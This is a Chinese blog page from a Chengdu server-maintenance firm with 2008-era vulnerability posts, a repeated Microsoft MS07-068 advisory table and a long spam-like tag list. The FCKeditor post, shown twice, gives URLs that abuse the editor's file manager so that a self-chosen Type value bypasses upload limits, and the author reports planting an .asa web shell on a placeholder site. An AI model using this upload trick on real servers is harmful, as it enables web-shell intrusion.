熊猫故乡-成都服务器维护-绵阳服务器维护-四川网络安全维护-秘密网
熊猫故乡-成都365安全网 -秘密网-成都服务器维护-绵阳服务器维护-四川网络安全维护 提供企业网络安全维护、企业网站维护、企业服务器维护等服务(成都服务器维护-绵阳服务器维护),咨询: 傅先生 13688425344
2008年3月12日
fckeditor网页编辑器的漏洞
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
.....................
Tags: Fckeditor 网页编辑器的漏洞
发布:coolher | 分类:漏洞攻防 | 评论:0 | 引用:0 | 浏览:
2008年3月12日
fckeditor网页编辑器的漏洞
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
.....................
Tags: Fckeditor 网页编辑器的漏洞
发布:coolher | 分类:漏洞攻防 | 评论:0 | 引用:0 | 浏览:
2007年12月26日
MS07-068:Windows Media File Format中存在漏洞
摘要
此关键安全更新解决了 Windows Media File Format 中秘密报告的漏洞。 如果用户在 Windows Media Format Runtime 中查看特制文件,此漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
建议。 Microsoft 建议用户立即应用此更新。
受影响的软件
操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告
Windows Media Format Runtime 7.1
Microsoft Windows 2000 Service Pack 4
Windows Media Format Runtime 7.1 (KB941569)
远程执行代码
严重
MS06-078
Windows Media Format Runtime 9
Windows 2000 Service Pack 4
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078
Windows XP Service Pack 2
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078
Windows Media Format Runtime 9.5
Windows XP Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Media Format Runtime 9.5 x64 Edition
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重
无
Windows Media Format Runtime 11
Windows XP Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Vista
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Vista x64 Edition
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Media Services 9.1
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Services 9.1 (KB944275)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Services 9.1 x64 Edition (KB944275)
远程执行代码
严重
无
此关键安全更新解决了 Windows Media File Format 中秘密报告的漏洞。 如果用户在 Windows Media Format Runtime 中查看特制文件,此漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
建议。 Microsoft 建议用户立即应用此更新。
受影响的软件
操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告
Windows Media Format Runtime 7.1
Microsoft Windows 2000 Service Pack 4
Windows Media Format Runtime 7.1 (KB941569)
远程执行代码
严重
MS06-078
Windows Media Format Runtime 9
Windows 2000 Service Pack 4
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078
Windows XP Service Pack 2
Windows Media Format Runtime 9 (KB941569)
远程执行代码
严重
MS06-078
Windows Media Format Runtime 9.5
Windows XP Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 (KB941569)
远程执行代码
严重
无
Windows Media Format Runtime 9.5 x64 Edition
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Format Runtime 9.5 x64 Edition (KB941569)
远程执行代码
严重
无
Windows Media Format Runtime 11
Windows XP Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
请参阅与此安全更新相关的常见问题
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Vista
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Vista x64 Edition
Windows Media Format Runtime 11 (KB941569)
远程执行代码
严重
无
Windows Media Services 9.1
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2
Windows Media Services 9.1 (KB944275)
远程执行代码
严重
无
Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2
Windows Media Services 9.1 x64 Edition (KB944275)
远程执行代码
严重
无
Tags: MS07-068 Windows Media File Format 漏洞
发布:coolher | 分类:漏洞攻防 | 评论:0 | 引用:0 | 浏览:
2007年9月4日
Asp脚本漏洞的安全防范
(1)首先我们从安装iis6.0的时候做好安装,我初步整理的安装格式如下:
Tags: 安全防范
发布:coolher | 分类:漏洞攻防 | 评论:0 | 引用:0 | 浏览:
网站目录
文章归档
Tags
- ASP漏洞 (1)
- 网络安全 (5)
- 百度 (1)
- google (0)
- 黑客攻防 (2)
- 网站维护 (6)
- 安全防范 (6)
- 服务器维护 (4)
- 漏洞攻防 (3)
- 服务器安全 (3)
- Fckeditor (3)
- 翻译公司 (3)
- 北京翻译公司 (3)
- 上海翻译公司 (3)
- 360安全卫士标准版 (2)
- 360安全卫生 (2)
- 安全防护软件 (2)
- 工资降为几百元 (2)
- 驱逐舰杀毒软件 (2)
- 正版免费下载 (2)
- 驱逐舰序列号 (2)
- virus (2)
- 驱逐舰 (2)
- 中国驱逐舰 (2)
- 驱逐舰下载 (2)
- 驱逐舰破解版 (2)
- 网页编辑器的漏洞 (2)
- 成都培训网 (2)
- 收养法 (2)
- 地震孤儿 (2)
- 地震孤儿收养 (2)
- 汶川地震孤儿 (2)
- 恒韵翻译公司 (2)
- 熊猫故乡 (2)
- 熊猫 (2)
- 成都文化旅游网 (2)
- 成都文旅 (2)
- 360安全卫士豪华版 (1)
- 湖南三少女被骗 (1)
- 广州被逼卖身 (1)
- 重庆强奸 (1)
- 活埋少女案开庭 (1)
- 被告 (1)
- 向受害者道歉 (1)
- 我国严查 (1)
- 妓女日记 (1)
- 网络淫秽 (1)
- 色情小说 (1)
- 制止工地扬尘 (1)
- 成都 (1)
- 城管队长被砍晕图 (1)
- 企业高管怀孕 (1)
- 后被调任保洁员 (1)
- 企业高管怀孕后 (1)
- 被调任保洁员 (1)
- 泉州网友将 (1)
- 小偷行窃图 (1)
- 在网络上公开组图 (1)
- 上海一白领扫厕所 (1)
- 入9000 (1)
- 成 (1)
- 最贵清洁工 (1)
- 胡锦涛批示尽快查明重庆客车燃烧事故原因中国新闻网 (1)
- windows清理助手2.0系列 (1)
- 超级系统垃圾清理软件 (1)
- 广告清除软件 (1)
- 成都网络安全维护 (1)
- 服务器维护成都服务器维护四川服务器维护绵阳服务器维护重庆服务器维护服务器维护专家 (1)
- 服务器维护方案整合服务器服务器安全 (1)
- 安全技巧 (1)
- WindowsVPN服务器 (1)
- VPN服务器 (1)
- VPN服务器维护 (1)
- 惊爆跳楼价 (1)
- IBM (1)
- X3105服务器仅售3999元 (1)
- 服务器维护报价 (1)
- 成都专业维护 (1)
- 服务器报价 (1)
- 服务器安全服务报价 (1)
- 黑客站长 (1)
- 网站安全检测 (1)
- 银行网页 (1)
- 成都黑客 (1)
- 未来网络安全十大趋势 (1)
- 黑客入侵攻击四种最新趋势 (1)
- 浅析网络犯罪如何取证 (1)
- 黑客游戏潜规则 (1)
- 黑客真人PK评述 (1)
- 企业信息化 (1)
- 打造安全文档系统 (1)
- 网站推广 (1)
- 全能营销7.7破解版免费下载 (1)
- 全能营销8.2破解版 (1)
- 伪装合法的系统后门 (1)
- 系统后门 (1)
- BBSGood.Speed (1)
- Version (1)
- 4.0注入漏洞 (1)
- 注入漏洞 (1)
- SQL (1)
- Injection基础与技巧经验 (1)
- SQL注入 (1)
- MS07-068 (1)
- Windows (1)
- Media (1)
- File (1)
- Format (1)
- 漏洞 (1)
- <=2.4.2 (1)
- For (1)
- php (1)
- 任意上传文件漏洞 (1)
- 陈冠希 (1)
- 艳照门 (1)
- 3月15日 (1)
- 选举国家主席 (1)
- 四川副省长 (1)
- 黄小祥 (1)
- 西部大开发应与 (1)
- 大开放有机结合 (1)
- 成都电脑培训网 (1)
- 功夫之王功夫之王剧情介绍功夫之王下载功夫之王在线播放 (1)
- 功夫之王 (1)
- 西方媒体热评 (1)
- 中国神话版《星球大战》 (1)
- 成都秘密网 (1)
- 成都白领交流中心 (1)
- 地震捐款 (1)
- 成都地震 (1)
- 汶川地震 (1)
- 福彩 (1)
- 救灾 (1)
- 孩子快抓紧妈妈的手 (1)
- 抓紧妈妈的手 (1)
- LED芯片制造设备 (1)
- 复明透镜 (1)
- 微透镜列阵 (1)
- 曝光头 (1)
- 均匀紫外面光源 (1)
- 紫外均匀面光源 (1)
- 镍管 (1)
- 镍管厂家 (1)
- 出售镍管-镍管 (1)
- 成都福利特种管材有限公司 (1)
- 治疗乙肝新突破 (1)
- 治疗乙肝 (1)
- hao123 (1)
- 百度与hao123 (1)
- 成都大熊猫繁育基地 (1)
- 驱逐舰杀毒软件 (0)
- LED芯片制造设备 (0)
- 治疗乙肝新突破 (0)